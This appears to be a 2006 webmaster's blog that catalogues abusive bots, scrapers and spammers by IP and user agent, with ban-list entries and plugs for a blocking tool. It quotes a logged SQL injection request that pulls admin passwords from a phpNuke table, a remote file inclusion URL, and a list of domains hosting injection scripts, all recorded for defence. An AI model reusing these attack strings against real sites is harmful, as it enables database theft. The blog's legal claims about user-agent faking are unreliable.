It would be nice if someone would write a new guestbook program that could work with the wordpress anti spam plugins but until they do I recomend everyone shutdown your guestbooks and convert to WP.

Having these old guestbooks up is encourging all the guestbook spamers.

Union injection hackers

A hacker not already noticed in your blog tried to hack my site last week with triying to inject code in my php page. If you are interrresting, Here are their IP and domain name : 66.110.9.76 89.108.91.144 202.8.85.44 Domain icezinhu.by.ru They tried injection whith this command file texte http://icezinhu.by.ru/ice.txt


I checked the url and the hack file no longer exists. If you have not already installed M&M Autoban you should because it will let you scan for all of those hacks.

I am adding the domain by.ru as a hacker website. Here is the current list of sites hosting the injection scripts. For those that don't understand they will post a union injection into your script with the url of a text file to run. Your poorly written script will then run that script and they will get full access to your server.

void.ru
paupal.info
expl0itz.com
echo.or.id
200.72.130.29
persiangig.com
fullcrew.net
paginas.aol.com.br
shikoe.net
by.ru

M&M autoban scans all the post and get data strings looking for anything that might be an injection.

ns.metalsusa.com abuse

Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)
63.123.84.196 ns.metalsusa.com

Why are metal roofing companies like metalusa.com sending bots to our sites?


Microsoft useragents explained

As per the Microsoft website they have never used a useragent that itentified itself as Windows NT without a version# after the NT so any useragent with this in it is fake. So we will now start looking for fake agents containing the following.

Windows NT) or Windows NT;

If anyone has anything else on this please post it.

Oct 10, 2006

dabworx.com abuse

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
66.98.212.79 dabworx.com

The above bot is a guestbook spammer.


The useragent is seen a lot from bots and I am begining to wonder if any real browsers even use this useragent.

net::trackback/1.01 abuse

net::trackback/1.01
209-9-169-114.sdsl.cais.net 209.9.169.114
209-9-169-124.sdsl.cais.net 209.9.169.124

Clearly some type of scrapper tool in HK.

added to ban list.

What is sdsl.cais.net
What is cais.net

I think the entire domain needs to be banned.

PCCW-HKT DataCom Services Limited
39/F PCCW Tower, Taikoo Place
979 King's Rd
Quarry Bay, Hong Kong 0
HK

xbox.dedi.inhoster.com / xbox.inhoster.com abuse

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)
85.255.117.226 85.255.117.226-xbox.dedi.inhoster.com


This xbox robot comes in posting to the contact forms but not the blogs with his trackback links. Doesn't understand the error messages he gets or that he is wasting his time he just keeps hitting the contact form ever few days or so.

Should really be no trafic from inhoster.com since its not a ISP so its blocked.
Scrapers have also been reported on this domain.

Update: Trackback spam now poring in using a trackback agent.

net::trackback/1.01
85.255.114.132 85.255.114.132-xbox.dedi.inhoster.com
net::trackback/1.01
85.255.114.131 85.255.114.131-xbox.dedi.inhoster.com
net::trackback/1.01
85.255.114.133 85.255.114.133-xbox.dedi.inhoster.com
net::trackback/1.01
85.255.114.134 85.255.114.134-xbox.dedi.inhoster.com

net::trackback/1.01
85.255.113.78 85.255.113.78-xbox.inhoster.com
net::trackback/1.01
85.255.113.77 85.255.113.77-xbox.inhoster.com
net::trackback/1.01
85.255.113.76 85.255.113.76-xbox.inhoster.com


Also recomend adding this IP to your servers IP ban.

inhoster.com,Used by scraper robots - Trackback Spam

random useragents from mail.midlandsteel.com

da4pxbtx4dbp iun xgt hifgbggalg4gcq
mail.midlandsteel.com 216.226.39.146

We see this a lot this, random useragents created by spam bots.
Its not clear why the mail server from midlandsteel.com is visiting our site with one but I thought I would post a notice about it.

For the most part random useragents are now under control and can be blocked by BB.

bb.answers.com 64.34.162.210 abuse bot

mozilla/4.0 (compatible; msie 5.5; windows nt 5.0)
bb.answers.com 64.34.162.210

Answers.com is sending out a robot with a FAKE useragent.

Nothing on the site explains why they are doing this or why they must fake a useragent.

Oct 9, 2006

ev1servers.net abuse

More info on the Evel Server

This domain was banned sometime ago for sending out abusive bots. Its not clear if they are spam bots or trackbots. They have also been known to fake the googlebot.

This domain is used by servers not users so everything from this domain is a bot and not a browser.

Well today they started hitting a blog again and went nuts when blocked. They tried several IPS but never got in.

Abuse from this domain is very active.

mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
209.85.54.147 ev1s-209-85-54-147.ev1servers.net
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
209.85.54.132 ev1s-209-85-54-132.ev1servers.net
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
209.85.54.148 ev1s-209-85-54-148.ev1servers.net
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
209.85.54.145 ev1s-209-85-54-145.ev1servers.net
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
209.85.54.143 ev1s-209-85-54-143.ev1servers.net
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
209.85.54.140 ev1s-209-85-54-140.ev1servers.net
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
209.85.54.136 ev1s-209-85-54-136.ev1servers.net
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
209.85.54.148 ev1s-209-85-54-148.ev1servers.net
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
209.85.54.142 ev1s-209-85-54-142.ev1servers.net

Update:

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
67.15.119.25 ev1s-67-15-119-25.ev1servers.net

In the latest hits above the bots have gone nuts inserting User-Agent: 2 times in from of the fake agent.

a Better Bot Trap that can not be detected.

I have been using the bot traps described by others only to find that the bots are avoiding them by scanning the robots file.

The solution is to unlist your robot trap. O yea you say good bots will just fall into it. Well thats ok we just ignore the major search systems and only scan for useragents starting with mozilla. Once we ignore the major search systems and other bots known to use mozilla everything that is left will be a bot faking a web browser and we can bann it.

I have a beta test of the unlisted bot up and running and I will soon see what it does.

If this still doesn't work then bots must be avoiding the traps in other ways.

Update on this. No one has fallen into the new bot trap. This tells me that the bots are not really spidering from image links they must be following in links from google.
Going to switch to using text links to the trap and see what I catch.

http: user-agent = mozilla/4.0 Fake useragent

http: user-agent = mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.0.3
65.54.225.173

This is a strange one. The useragent has http: and user-agent = in it its clearly an atempt to fake a useragent.

Stranger is that the IP is a MS IP. Making it look more and more like MS IPs are being used to send spam.


Adding this check phrase to UA-Anywhere ban list.
user-agent =,unknown bot

hn.kd.dhcp abuse

mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)
hn.kd.dhcp 61.54.11.169

This is not a real domain but if you see it its a giveaway for spam
Add this to your domain ban.

reverse.layeredtech.com snoopy v1.2.3 Abuse

POST HTTP/1.0
snoopy v1.2.3
72.232.60.162 162.60.232.72.reverse.layeredtech.com

This bot came in using snoopy and tried to post 6 loads of spam to the blog.
A legit snoopy agent would never post to your blog. Because the latest spam bots have started using the snoopy useragent it is now banned.


layeredtech.com is not a ISP its a hosting company where abusers are setting up bots to abuse websites. The domain needs to be added to the domain ban list.


reverse.layeredtech.com,unknown bots

IconSurf/2.0 favicon monitor (abuse)

400 Prohibited header 'Range'
IconSurf/2.0 favicon monitor (see http://iconsurf.com/robot.html)
12.146.74.139 xoba.com

The above robot is blocked by Bad Behaivor due to impropper headers.

I suggest that the useragent and domain name also be added to the block list.

This website indexes your .ico files and then hotlinks to them from its site. Resulting hotlinking will run up your bandwidth.

If you have not done so already suggest adding .ico to any hotlink protection system you are running. If you are not running one you really need to.


The site says they will honor robots file so you should also add a line to that as well.

User-agent: IconSurf
Disallow: /

Oct 7, 2006

security-lab1.juniper.net abuse

python-urllib/1.16
208.223.208.181 security-lab1.juniper.net

The above bot fell into a bot trap. In order to do this it had to violate the rules in the robots.txt file. It is not clear why www.juniper.net is sending out a bot.

I have written to them and am waiting for a reply on what this thing is and why it was caught in a improper crawl.

In the mean time python-urllib/1.16 is added as a email harvestor since thats why I find about that useragent on other sites.

203.117.201.35 mx1.khattarholdings.com abuse

Missigua Locator 1.9
203.117.201.35 mx1.khattarholdings.com

The locator agent is thought to be a email harvestor. However this ip is connected with gustbook spam. The domain has no website and is from Singapore.
Registrant:
KHATTAR HOLDINGS PRIVATE LIMITED (KHATTARH272)
80 RAFFLES PLACE
#25-01 UOB PLAZA 1
SINGAPORE, , 048624
SG


Domain added to domain ban

User-Agent: Mozilla/4.0 abuse

What do you think of this one? Is it bad robot?
IP: 72.13.32.7
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Publish Reject


If you see a useragent with User-Agent: in the agent then its a known robot.
We are not sure what its doing.

Oct 4, 2006

sdcresearchlabs-testbot abuse

sdcresearchlabs-testbot/0.8-dev (www.shopping.com/bot.html; http://lucene.apache.org/nutch/bot.html; researchbot@shopping.com)
72.5.173.21

As part of our ongoing efforts to improve the buying experience for shoppers online, Shopping.com is experimenting with new ways to collect and aggregate data through web crawling. At this point we do not plan on integrating inventory from our web crawling index with inventory


Say what! You pirate our content and bandwidth for your own internal test and don't even plan to index the data on your website. Now thats what you call abuse.

Why on earth should we allow you to do that.

Shopping.com is a pay site you have to pay to get listed unlike you do on google's froogle where its free. Stay off my site unless you want to pay me or actualy list teh info on your site!

To start with your using nutch a free package you downloaded. Nutch is banned from all my sites.

And you were not even scanning my store you were scanning a local blog how lame is that?

How often will sdcresearchlabs-testbot access my web pages?
For most sites, sdcresearchlabs-testbot shouldn't access your site more than once every few seconds on average.


What the ________? ONCE ever FEW SECONDS do you know how much bandwidth that is?



They say you should add "sdcresearchlabs-testbot" to your robots file. I am gona try that and see what it does.

Oct 2, 2006

net-sweeper.com is content filtering remove from domain ban

When this one was added the robot on this domain was caught in dos atacks.
See here It now looks like the bot was just broken and this is some type of content filtering for schools and business. So it is being removed from the ban list adjust yours.

Also see this list of bad bots. listed as not looking at the robots file. Will be monitoring to see if it falls into a bot trap.


Remove from domain ban file
net-sweeper.com,Hides what it is was caught in DOS atacks.

vodka.ietsmetinternet.nl abuse bot drunk on vodka

66.232.113.20 vodka.ietsmetinternet.nl

The above bot has started scanning with no useragent. It is not clear what its trying to do not it keeps comming back even tho it gets a blocked screen. Must be drunk on Vodka.

A search for this only shows this subdomain hitting other sites. The main website gives a file not found page.

The domain is added to the domain ban

ietsmetinternet.nl,unknown drunk on vodka bot.

ns1.input-box.com abuse

'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)'
81.177.34.184 ns1.input-box.com

This is abot using a known useragent.

input-box.com has a blank page for a website so the entire domain is banned.


added to domain ban

input-box.com,Unknown bots

spokane.dailydns.com Blog abuse SPAM

snoopy v1.2.3
69.16.221.13 spokane.dailydns.com

This is a blog spammer. Using useragent snoopy v1.2.3 We ban this useragent.
If you surf to the subdomain you will see a website that is not setup.
A search of google can find nothing on this subdomain however spam has been seen from other subdomains and the main domain is not really working so I am banning the it and all subdomains.


added to the domain ban.

dailydns.com,Blog spam website is down

Sep 29, 2006

Web Scrapers Violate the Digital Millennium Copyright Act

The Digital Millennium Copyright Act makes it a crime to create software
that allows a user to get around any copy protection used to stop
theft of copyright content.

Companies that create bots that fake useragents to get around our blocks
violate the DMCA.

We need a class action lawsuit against these software authors that create Web Scrappers.

geosign-v47.fibrewired.on.ca abuse unknown bot

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca

Robot fakes useragents.
Loads the robots.txt file and then loads files it is told not to.
Has fallen into the bot trap several times.

This bot holds this IP and is hosted on fibrewired.on.ca
Canada

added to domain ban

geosign-v47.fibrewired.on.ca,Unknown Canada bot

static.theplanet.com kostanay spam

ThePlanet is offering internet access to businesses so we have to be carefull about banning that domain.

Verified robots list that need to be banned

70.86.137.162
a2.89.5646.static.theplanet.com


Update I am fed up with this bot its trying to place orders on my store using only a name and city. And is copying all the keys off the pages.
92.3f.5746.static.theplanet.com 70.87.63.146
name : alex
city : kostanay

So everything from static.theplanet.com is now banned.

name=ahmet
city=kostanay
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)
70.87.63.146 92.3f.5746.static.theplanet.com

reversedns.resolve.ru abuse

NO AGENT-
72.36.245.205 72.36.245.205.reversedns.resolve.ru

Resolve Ltd. is a Russian hosting company which appears to be involved in fraud schemes. A search on the ip address will return a lot of spammed guestbooks, mostly for pills. Apparently the spammer specialised on targetting the Advanced Guestbook script. The bot is using both random user agents and proxy servers and the referrer pointed to the domain hitairfare.com.

This robot was caught scanning with no agent which is automaticaly blocked. To prevent entry by any of its other fake agents the domain needs to be added to the domain block list.

reversedns.resolve.ru,guestbook spam and Fraud

Sep 27, 2006

Just what is btcentralplus.com

We receive a lot of abuse from this domain and a lot of webmasters are blocking it.
But since the domain has no website it was not clear what it was.
After a long search I have discovered that its British Telecom DSL.
See DSL report page. This was the only site that told what it was.

Why the lame tecs at BT dont have a website at that domain is confusing because not knowing what it is is getting BT customers globaly banned.

btcentralplus.com should not be banned as it is a ISP
It is not clear yet if dsl modems keep the same IP so we have to ban by IP until we know.

To the folks at BT Please put a website at www.btcentralplus.com

Sep 25, 2006

necbot/1.0 (nec labs america)

necbot/1.0 (nec labs america)
All Hits From svext.nec-labs.com 138.15.10.10

I can find no info on this bot.

The IP is registered to NEC but its confusing as to why NEC has a bot. This might be banned later as we are not sure what it is.

OrgName: NEC Laboratories America, Inc.
OrgID: NLA-29
Address: 4 Independence Way
Address: Suite 200
City: Princeton
StateProv: NJ
PostalCode: 08540
Country: US

geosign-v47.fibrewired.on.ca bad bot

First the bot falls into a bot trap it found from reading the robots.txt file.
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca

Just to make sure it hots the bot trap again with another useragent
mozilla/4.0 (compatible; msie 5.0; windows xp) opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca


Then it tries to scan the site. Note how its user agent changes as it scanns.

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca

This one gets stoped by BB as improper headers
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca

Stoped by BB
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca

It just keeps hammering like this but never gets in.

SO what is this bot doing?

Sep 24, 2006

baiduspider bad bot ignores robots.txt

baiduspider+(+http://www.baidu.com/search/spider.htm)
202.108.11.106
202.108.11.108
60.28.17.43

This is a china search system that indexes sites writen in chinese I think.
Since my sites are in english I don't understand why its trying to index me.

It says to add "baiduspider" to your robots file. I did this months ago but its back.
It is ignoring the robots.txt file.

The above IPS are in the blacklist as spammers. See link. You hace to click on OPEN RBL and then when the second window opens click on LOOKUP this will display all the block list in red.


It has been added to the useragent ban list and is blocked but it just ignores the
eror and keeps comming abck. Its time to add the IPS to the Server IP ban.

deny from 202.108.11.106
deny from 202.108.11.108
deny from 60.28.17.43

More work needed to find all its ips.

64.34.173.76 lucy.electroclash.us BOT

Mozilla/7.0
64.34.173.76 lucy.electroclash.us

What is this Mozilla 7 thats invalid. Some kind of bot. The website has what looks like a guestbook on its frontpage.

It hit 2 of my domains and was stoped by BB as invalid.

compatible; MSIE 6; Win32; Mck IS it a new bot?

User-Agent claimed to be MSIE- with invalid Windows version

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Mozilla/4.0(compatible; MSIE 6; Win32; Mck); .NET CLR 1.1.4322; InfoPath.1)

What is this useragent? It first looks ok stating
compatible; MSIE 6.0; Windows NT 5.1;
But then has a second part that which looks like the useragent is starting over.
Mozilla/4.0(compatible; MSIE 6; Win32; Mck); .NET CLR 1.1.4322; InfoPath.1)
Inside this strange string is another browser version.
compatible; MSIE 6; Win32; Mck

What is MSIE 6 This is invalid
What is Win32 this is also a invalid version
What is Mck
Why is Mozilla/4.0 repeated?

If this is not some strange proxy then this is a new bot.

This is banned by BB as a invalid windows version.

88.198.38.230 proxy.adressendeutschland.de harvstor

www.adressendeutschland.de
88.198.38.230 proxy.adressendeutschland.de

This bot is a Spammers dream. It is creating a database of all websites
NAME ADDRESS PHONE# & EMAIL ADDRESS Once finished it will have a search option to look up the data.

This is why you should not post your name address and phone# on your website. Give this data only to customers who place orders. Or require a customer to have an account before its displayed. New customers only need a contact form.

It claims it will not display anyone not in a "Trade Register" don't know what that is but if its true why are they scanning non business websites?

Read the translation of what they are doing here.

Email/Contact info Harvestor.

Sep 20, 2006

hostnoc.net abuse

mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)
83 hits From 6419136165.hostnoc.net 64.191.36.165

The above is one of the suspected useragents that always turnes out to be a robot and not a browser. A search of google shows a lot of abuse from this domain so its banned.


domain ban list

hostnoc.net,pro spam host

Sep 19, 2006

LWP::Simple/5.48 FastCounter Robot using LWP

LWP::Simple/5.48
204.71.191.109

The bcentral FastCounter sends out a robot to check your link and verify your site. However this robot doesn't have its own useragent it uses "LWP::Simple/5.48" which is banned by most everyone is a spambot.

Atempts to report this failed because both the chat and email contact forms do not work on the fc.bcentral.com site. I also just discovered that FastCounter free is no longer free unless you had already created your counters before 2005 I have about 15 such counters so mine are still working.


If you have trouble with your counters not working you will have to add the above ip to the whitelist.

Just what is blogslive - Admitted Data-Minner

blogslive (info@blogslive.com)
64.158.138.84 floodgate.intelliseek.com

Blogslive will visit your blog the same day you create it.
The blogslive.com is just a godady parked webpage no such site exist.
The website intelliseek.com also does not exist it redirects to nielsenbuzzmetrics.com

To quote this website.
With solid data-mining technology, superb research and Nielsen’s unrivaled experience in media measurement and client services, we help today’s companies, brands and business professionals better understand the influence and impact of CGM on products, issues, reputation and image.


So the blogslive is what I suspected all along its a fake robot for nielsenbuzzmetrics.com used to data-mine your website so they can sell your content to others. Can you say copyright violation?


Banned Banned Banned....................

64.233.182.136 fakes google

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Google Wireless Transcoder;)
64.233.182.136


This IP was caught faking the google proxy which is banned because anyway because its a proxy.

Sep 17, 2006

enmaxenvision.net dragonfly bot

dragonfly(ebingbong@playstarmusic.com)
72.29.233.186 a72-29-233-186.enmaxenvision.net

enmaxenvision.net rdirects to enmax.com enmax has something to do with utilities cant tell what they are but they and not a ISP and should not be running a robot.

Both the domain and useragent should be banned.



enmaxenvision.net,Email harvestor

stpxc02.sentechsa.net spam tool

isc systems irc search 2.1
168.210.90.181 stpxc02.sentechsa.net

Caught this spam harvestor running on a domain that has no website.



Add to domain ban
sentechsa.net,Spam Email Harvestor

wmstream.libertyleague.com SpamBot

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
69.41.171.138 wmstream.libertyleague.com

This is a MLM company. Could not find any tracks in google must be a new spambot they have started up this week.


This domain should be added to the ban list.

I do see a court setelment on pyramid marketing here

Domain ban
libertyleague.com,MLM co running Unknown Bot

Sep 13, 2006

ns1.downriterotten.com abuse

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
72.232.31.82 ns1.downriterotten.com

Yes the above useragent is one of the known spam tools.
This domain has a page saying they will be back up soon while a google of the domain shows posting on adult webmaster forums.

This domain is banned for using spam tools.



downriterotten.com,Caught using spam tools

Sep 12, 2006

trishuli.cs.UMBC.EDU spambot

Java/1.5.0_02
130.85.94.152 trishuli.cs.UMBC.EDU

This is known spam software use to harvest email addresses.
It is running in the Computer Science Dept of the University of Maryland.

This has been reported.

static.88-198-43-39.clients.your-server.de bot

88.198.43.39 static.88-198-43-39.clients.your-server.de

From Germany has no agent.


Its not clear what this bot is trying to do. Its always on the same IP and only hits the top page.

dynamic.apogeenet.net Guestbook Spammer

ADD Spam robot Trap
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
64.192.20.104 dynamic.apogeenet.net

After doing a search I see that this domain often turns up on guestbooks posting spam so this domain is now added to the domain block.

dynamic.apogeenet.net,Guestbook Spammer

IRLbot/2.0 bot banned

Request : /contact.html
IP : 128.194.135.81
Agent : IRLbot/2.0 (compatible; MSIE 6.0; http://irl.cs.tamu.edu/crawler)

This bot didn't make it into the site it went straight to a old contact form that had been removed due to spam and hit it 7 times.


This bot was banned long ago for being a waste of bandwidth being that it only takes our bandwith and gives nothing back.

To quote the website.
"Texas A&M research project sponsored in part by the National Science Foundation that investigates algorithms for mapping the topology of the Internet and discovering the various parts of the web."
Thats great and all but Texas A&M needs to use its own bandwidth for this project and not ours.

Mozilla/5.0 Agent by itself

Agent: Mozilla/5.0
218.209.235.203
Agent: Mozilla/5.0
195.42.75.75
Agent: Mozilla/5.0
203.153.45.50

As you can see the same bot hit from 3 places one after another.

I have seen this before being used by the hackers it is clearly some type of hack tool or script.

To prevent false alarms this can not to be added to the useragent ban list it must be hard coded in as an exact match which will be done in the next release of MMAUTOBAN. v3.3

Sep 11, 2006

sproose/0.1 (the Sproose Goose bot)

GET HTTP/1.0
Agent: sproose/0.1 (sproose bot; http://www.sproose.com/bot.html; crawler@sproose.com)
from Ips
38.100.225.7
38.100.225.8
38.100.225.12
Most likely others but we are not keeping track.

Free Image Hosting at www.ImageShack.us

The Sproose Goose is banned because its a startup with no content. Scrappers often use the fake startup scam to get past blocks. Unless the sproose goose actualy does fly. They will stay banned. Right now we do not know if this is a real company or a scraper.

Robot was caught following links it should not be able to see because its banned. Ony way it could be doing what its doing is if it were following google listings back to our site.

Added to UA Start file
sproose/0.1,Fake Startup co

Sep 9, 2006

201.200.22.146 Hacker

ADD ALARM: */select/* injection
modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0-0-pwd-0-aid/**/FROM/**/nuke_authors GET HTTP/1.1
Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; simbar enabled; simbar={ff31d371-c0bf-4f98-ac32-ccaee7d5f828})
201.200.22.146

The above atempted union injection hack of the phpnuke database was detected and the ip autobanned by M&M Autoban.



One wonders why I am seeing a lot of hackers with simbar enabled in the user agent.
None of my regular visitors have simbar.

Sep 7, 2006

microsoft.com spoofed?

Blacklist Domain Ban: microsoft.com Entire range spoofed by hackers
Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.2; wow64; sv1)
131.107.0.96 tide526.microsoft.com

Word is that someone is using microsoft ips.

One would think MS would be using msie 7 if it was real.

Update I started seeing what looked like valid users so this domain was removed from the ban list but is being watched.

Bad Behaivor Whitelist adjustment

Bad behaivor has some problems with known good bots. You need to adjust your whitelist to let them in.

edit the whitelist.php and change the $bb2_whitelist_ip_ranges to.

$bb2_whitelist_ip_ranges = array(
// Looksmart
"64.242.88.60",
// Scooter/3.3
"66.94.232.246",
"66.94.238.51",
"66.94.238.52",
// YahooSeeker/1.2
"68.142.230.184",
// FreeFindRobot Good bot with some header problems
"63.203.65.217",
// CJ.com banner tester
"216.34.209.23",
);

These are known bots that BB blocks due to header problems. Without this change altavista scooter will not be able to index your site.
CJ.com has been added because the new robot they use is blocked as a spambot.

security.lightspeedsystems.com abuse

bad-behavior 400 Required header 'Accept' Missing.
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
66.17.15.154 66-17-15-154.security.lightspeedsystems.com

Thought to be a scrapper. See other info here

Reports now say that this is content filtering.
lightspeedsystems.com
If it is its the worst bot ever writen because it fakes its useragent and sends ilegal headers. Clearly not the tec leaded it says on the website.

Writing to lightspeed and waiting for a reply.

Update:
lightspeedsystems.com refuses to reply to my emails so its banned I don't care what they say it is. It is abuse because they are faking the useragents and are using improper headers and they do not identify themselves in the scan.


added domain ban
lightspeedsystems.com,Wont reply to emails abuse

Also banned by all blogs using Bad Behavour

Sep 6, 2006

nat.la.valueclick.com Java/1.5.0

Java/1.5.0_06
64.70.54.15 nat.la.valueclick.com
cjnetworkquality; http://www.cj.com/networkquality
64.70.54.15 nat.la.valueclick.com

Java/1.5.0_03
216.34.209.23 mx4.cj.com

Valueclick and cj.com are the same company. It is unclear why they are using this useragent. This useragent is blocked as a known spam tool they should not be using it.

This has been reported to valueclick and cj.com.

UPDATE
after 1 month CJ sent this reply to the problem of a broken useragent string.

For further details, regarding our Network Insight Spider, please access the following URL:
http://www.cj.com/networkquality/


Well....... Hummm what am I to say to that answer?

And people wonder why customer service people have a bad rep.

What to do.
This looks like a legit bot that needs to be let in, however cj would not reply if it was the real cj bot or not.
The ip needs to be added to the whitelist in BB and M&M Autoban however I have not seen it this month so it may be fixed. Will have to wait and see.

But anyway no point in writing to them again all they game me after 1 month was the URL thats in the normal useragent string.

How to protect your site

Protect your website in realtime.
As seen on PC Magazine

Protect your PHP site and scripts from bad abusive robots that use up your bandwidth.

Have you checked your logs only to find you have more robot or unknown users than you have real visitors.

Examples of what is visiting your site
Robots watching to see if your domain expires
Robots from some startup search engine no one will ever use
Robots from search engines in languages you dont serve
Robots from companies trying to see if you volated some copyright
Robots from some government website monitoring for some unknown content
Robots trying to collect email addresses
Robots trying to hack into your site
Robots pinging your scripts in an atempt to get your software to list they came from
Robots probing for scripts called modules.php posting.php submit.php and others
Robots using random agents to avoid blocking.
Hackers trying to use union injections on your database

Copyright owners have the legal right under the DMCA to reserve the right to view content only to website visitors. Webmasters have the legal right under DMCA to block access to anyone who wants to store or copy website content. It is also a crime under US law to use any trick or false information to gain access to a computer system. Running a robot that pretends to be a user by faking its useragent is crime under US Law because it is using false information to gain access to a computer system.


M&M Autoban can be used as a Bot-Trap to autoban every ip that hits a trap listed in your robots file. It is included in all of your php scripts to check the user against the ip ban list and then verify that the visitor qualifies to visit your website.

You can not just send spam bots into a endless fake email loop unless you have unlimited bandwidth and you don't care about a slow server. And it doesn't hurt them anyway. A spam bot must be terminated ASAP with as little bandwidth being used as possible.


Works with Bad Behavior but BB is not required.

Works on all PHP scripts needs no database!
Prevents Union Injections and known hacks.
Tracks agents
Set blocking list anyway you like

Now works With Wordpress.

Clich on downloads to the right.

csccorporatedomains.com abuse Corp. Snooper

Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
64.124.14.107 csccorporatedomains.com
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
64.124.14.126 csccorporatedomains.com
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)
64.124.14.126 csccorporatedomains.com
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040218 Galeon/1.3.12
64.124.14.120 csccorporatedomains.com
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
64.124.14.120 csccorporatedomains.com
Mozilla/5.0 (compatible; Konqueror/3.1; Linux; en)
64.124.14.120 csccorporatedomains.com
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)
64.124.14.120 csccorporatedomains.com

All of the above were blocked by bad-behavior as having defective headers.
Only 1 old win85 bot gets past BB but is blocked by our domain ban.
mozilla/4.7 [en] (win95; u)
64.124.14.120 csccorporatedomains.com
mozilla/4.7 [en] (win95; u)
64.124.14.124 csccorporatedomains.com


This has now all been tracked back to a service called "Brand Audit and Patrol" it visits our sites to see if we are saying bad things about brand names. And to check if we have brand logos.

Problem is that they are using a defective robot that is blocked by all blogs that use Bad behavior. Its likely that this patrol bot can not even see 60% of all the blogs its trying to scan due to poor programming.

Also this robot fakes useragents to gaining access to websites in violation of US federal law. Which makes it a crime to use false information and or any trick to gain access to a computer system.

This domain is banned for wasting bandwith and using false information and tricks to gain access to website content.

csccorporatedomains.com,brand audit patrol

ip.secureserver.net Funny

64.202.160.65
Blacklist Domain Ban: ip.secureserver.net Godady web hosting -
Unknown bots
http://www.google.com/search?hl=en&q=robot+blocking+scripting

Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr
1.1.4322)

Domain: nat-64-202-160-65.ip.secureserver.net


secureserver.net doesn't have a website it redirects to
http://www.securepaynet.net/gdshop/404error.asp which is godady
payment service.

How does someone run Windows on a godady server. They dont its a bot
and its scanning for info on who is blocking bots, Funny. What does this
tell you.

We were banning just part of this domain but now suggest banning the
entire thing.



secureserver.net,Godady web hosting - Unknown bots

Panscient Data Services

38.99.203.110 Panscient_Data_Services.demarc.cogentco.com

Orginaly the bot was detected scanning the site using a fake useragent. This was reported to cogentco.com who sent back a canned reply that this was a nice bot and followed robots file.

My orginal request for info on who ran the bot and why it was faking a useragent of a browser were ignored.

I replied back to abuse and asked if cogentco.com owned this bot and why it was using a fake useragent if it was a nice bot. But my questions were ignored and all I got back was the same canned reply.

cogentco.com knows about this bot, allows it to operate, hides the idenity of its owner and ignores complaints about it.

This bot was built by www.panscient.com it is unclear if they own it.

At Panscient Technologies we design, build and operate custom internet search engines that unlock the hidden structure of web data.
Using state of the art AI technology, Panscient Technologies' software analyzes web sites for their information content and compiles the data into a searchable index.


Yea right state of the art scrapping.

At this time it is unclear who else uses this bot because its stealth.

Add to domain ban list
Panscient_Data_Services.demarc.cogentco.com,Abuse

or to the ip ban on your server 38.99.203.110

nodomaintransfer21.com Singapore peepsurf.com

NO AGENT-
66.139.76.245 nodomaintransfer21.com

